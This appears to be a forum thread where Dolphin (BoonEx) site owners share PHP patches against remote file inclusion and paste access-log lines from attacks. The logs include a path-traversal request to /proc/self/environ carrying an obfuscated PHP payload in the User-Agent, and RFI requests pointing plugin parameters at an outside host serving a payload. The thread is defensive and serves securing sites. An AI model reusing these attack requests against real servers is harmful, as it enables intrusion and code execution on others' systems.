add the fllowing code to your ray/modules/global/inc/content.inc.php
add it at the top above the 1st require once command
if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');
so it looks like this :
if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');
require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");
this stops any remote includes being used
next edit /plugins/safehtml/HTMLSax3.php add this at the top above the require once
if (isset($_REQUEST['dir']))
die ('Hacking attempt');
so it looks like this:
if (isset($_REQUEST['dir']))
die ('Hacking attempt');
require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );
this stops remote access to your directories
PS we involved to making fast-fix-patch that close all such holes in security for old PHP versions to prevent change variables via GET params, or if register globals is On,
Also we close another security holes (just because here not only this way to hack any sites)
I spend several days and found many ways to hack any sites. So register globals and all fixes above just more simpliest and old way :)
i was never hacked, but i wanted to be 100% sure my server was secure so asked them to look at the attacks and fix it. thats what they came up with, but they also said there is still some questionable code in the content.inc.php file
DoLaugh
Greets,
Jerry
All the best.
Stuart
Ps. what was that about questionable code...?
i am not a programmer so didnt ask, and they might have charged me more lol
i think boonex are working on that file now to solve the issues.
thanks for the code mod snippets.
I work at hfw and am attempting to put this to use on one of the Dolphin installs that repeatedly gets suspended from RFI injections, etc...(seems like all I do is chase this exploit around.)
boonex says it's our register_globals=on on our VPSs.
We'd like to think it's the 777 perm'd directories
but I have seen RFIs even with it off.
Believe me, I want to see this activity solved once and for all.
I remain hopeful.
You mentioned "here see more
Trying this mod now. My site has been hacked several times after the dolphin security fix. I have followed all security instructions and keeping getting hacked through Boonex scripts.
//plugins/safehtml/safehtml.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 617 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; see more
83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 200 638 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET /errors.php?error=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 404 1550 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 see more
/ray/XML.php?action=getSettingValue&key=status&widget=youtube&file=main&_t=19
POSSIBLE
/plugins/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&core=true&suffix=&themes=simple%2Cadvanced&plugins=style%2Clayer%2Ctable%2Csave%2Cadvhr%2Cadvimage%2Cadvlink%2Cemotions%2Ciespell%2Cinsertdatetime%2Cpreview%2Cmedia%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cdirectionality%2Cfullscreen%2Cnoneditable%2Cvisualchars%2Cnonbreaking%2Cxhtmlxtras&languages=en
i have an extra row as you can see header.inc
require_once('header.inc.php');
require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");
you can still apply the patch if you wish. but you should be safe is you are on a server with register_globals off